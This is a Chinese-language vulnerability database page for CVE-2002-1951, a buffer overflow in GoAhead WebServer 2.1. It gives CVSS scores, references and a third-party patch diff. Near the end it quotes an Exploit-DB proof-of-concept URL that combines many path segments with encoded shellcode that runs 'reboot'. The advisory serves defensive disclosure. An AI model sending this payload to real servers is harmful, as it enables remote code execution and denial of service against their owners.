CVE-2002-1951
CVSS7.5
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:56
NMCOE    

[原文]Buffer overflow in GoAhead WebServer 2.1 allows remote attackers to execute arbitrary code via a long HTTP GET request with a large number of subdirectories.


[CNNVD]GoAhead WebServer远程缓冲区溢出漏洞(CNNVD-200212-411)

        
        GoAhead WebServer是一款开放源代码的嵌入式WEB服务器程序,支持Active Server Pages,嵌入式Javascript,SSL验证和加密,广泛使用在Microsoft Windows和Linux操作系统下。
        GoAhead WebServer存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行代码指令。
        GoAhead WebServer对用户提交的URL请求缺少正确的处理,远程攻击者可以提交恶意特殊的URL使GoAhead WebServer处理时产生缓冲区溢出,通过覆盖内存中返回地址以WEB进程权限执行任意指令。
        <**>

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1951
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1951
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-411
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5464
(PATCH)  BID  5464
http://www.securiteam.com/securitynews/5MP0C1580W.html
(PATCH)  MISC  http://www.securiteam.com/securitynews/5MP0C1580W.html
http://www.iss.net/security_center/static/9884.php
(PATCH)  XF  goahead-long-url-bo(9884)

- 漏洞信息

GoAhead WebServer远程缓冲区溢出漏洞
高危 边界条件错误
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        GoAhead WebServer是一款开放源代码的嵌入式WEB服务器程序,支持Active Server Pages,嵌入式Javascript,SSL验证和加密,广泛使用在Microsoft Windows和Linux操作系统下。
        GoAhead WebServer存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行代码指令。
        GoAhead WebServer对用户提交的URL请求缺少正确的处理,远程攻击者可以提交恶意特殊的URL使GoAhead WebServer处理时产生缓冲区溢出,通过覆盖内存中返回地址以WEB进程权限执行任意指令。
        <**>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 目前已经有如下第三方补丁,不过NSFOCUS没有对这个第三方补丁进行测试:
        diff -u ws212-020612/default.c ws212-020612gby/default.c
        --- ws212-020612/default.c Wed Jun 12 19:38:48 2002
        +++ ws212-020612gby/default.c Wed Jun 19 16:34:24 2002
        @@ -204,9 +204,11 @@
        * is bad.
        */
        +#define MAXDIRPATH (64)
        +
        int websValidateUrl(webs_t wp, char_t *path)
        {
        - char_t *parts[64]; /* Array of ptr's to URL parts */
        + char_t *parts[MAXDIRPATH]; /* Array of ptr's to URL parts */
        char_t *token, *dir, *lpath;
        int i, len, npart;
        @@ -241,7 +243,11 @@
        } else if (gstrcmp(token, T(".")) != 0) {
        parts[npart] = token;
        len += gstrlen(token) + 1;
        - npart++;
        + if(++npart >= MAXDIRPATH) {
        + /* Damn script kitties... */
        + bfree(B_L, path);
        + return -1;
        + }
        }
        token = gstrtok(NULL, T("/"));
        }
        厂商补丁:
        GoAhead Software
        ----------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.goahead.com/webserver/webserver.htm

- 漏洞信息 (21707)

GoAhead WebServer 2.1 Remote Arbitrary Command Execution Vulnerability (EDBID:21707)
windows remote
2002-08-14 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/5464/info

GoAhead WebServer is an Open Source embedded web server which supports Active Server Pages, embedded javascript, and SSL authentication and encryption. It is available for a variety of platforms including Microsoft Windows and Linux variant operating systems.

It has been discovered that a buffer overflow exists in GoAhead WebServer. This vulnerability could make it possible for a remote user to execute arbitrary code with the privileges of the web server process. This could lead to an attacker gaining remote access to a vulnerable host.

http://www.example.com/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8%dc%ff%ff%ffreboot
		

- 漏洞信息

59786
GoAhead WebServer HTTP GET Request Subdirectory Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-08-14 Unknow
2002-08-14 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站